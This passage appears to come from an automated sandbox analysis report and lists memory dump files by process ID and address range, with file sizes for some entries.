                                                                                                            • memory/5136-255-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5180-352-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5264-259-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5264-264-0x0000000004427000-0x0000000004528000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/5264-266-0x0000000004610000-0x000000000466C000-memory.dmp
                                                                                                              Filesize

                                                                                                              368KB

                                                                                                            • memory/5268-317-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5312-367-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5336-355-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5380-270-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                              Filesize

                                                                                                              3.5MB

                                                                                                            • memory/5380-273-0x00000001401FBC30-mapping.dmp
                                                                                                            • memory/5380-295-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                              Filesize

                                                                                                              3.5MB

                                                                                                            • memory/5392-329-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5404-315-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5476-278-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5524-340-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5624-369-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5628-365-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5636-366-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5652-286-0x0000000000401480-mapping.dmp
                                                                                                            • memory/5652-285-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                              Filesize

                                                                                                              284KB

                                                                                                            • memory/5660-316-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5756-344-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5776-347-0x0000000000402F68-mapping.dmp
                                                                                                            • memory/5860-338-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5892-298-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5964-359-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5988-331-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5992-301-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6004-358-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6008-303-0x00000001402CA898-mapping.dmp
                                                                                                            • memory/6008-304-0x000001F8EB930000-0x000001F8EB944000-memory.dmp
                                                                                                              Filesize

                                                                                                              80KB

                                                                                                            • memory/6008-302-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.0MB

                                                                                                            • memory/6112-320-0x0000000000000000-mapping.dmp